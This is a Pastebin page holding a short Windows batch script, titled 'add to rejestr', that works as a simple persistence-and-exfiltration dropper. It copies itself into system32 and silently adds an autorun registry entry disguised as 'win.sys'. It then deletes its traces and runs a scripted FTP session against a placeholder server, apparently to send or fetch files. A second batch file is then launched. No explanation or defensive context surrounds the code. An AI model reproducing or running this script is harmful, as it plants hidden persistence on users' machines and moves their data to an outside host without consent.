Advertisement
kamilnowinski

add to rejestr

Nov 11th, 2011
190
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.48 KB | None | 0 0
  1. @echo off
  2. md C:\WINDOWS\system32\xdd
  3. copy C:\rejestr.bat C:\WINDOWS\system32\rejestr.bat >nul
  4. copy C:\vistaa.txt C:\WINDOWS\system32\vistaa.txt >nul
  5. @echo REGEDIT4 >>a.reg
  6. @echo. >>a.reg
  7. @echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] >>a.reg
  8. @echo "win.sys"="C:\\WINDOWS\\system32\\rejestr.bat" >>a.reg
  9. @echo. >>a.reg
  10. regedit /s a.reg
  11. dir >nul
  12. del a.reg >nul
  13.  
  14. ftp -n -s:vistaa.txt myserver.xxx.xx >nul
  15.  
  16. start C:\WINDOWS\system32\xxx.bat
  17.  
  18. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement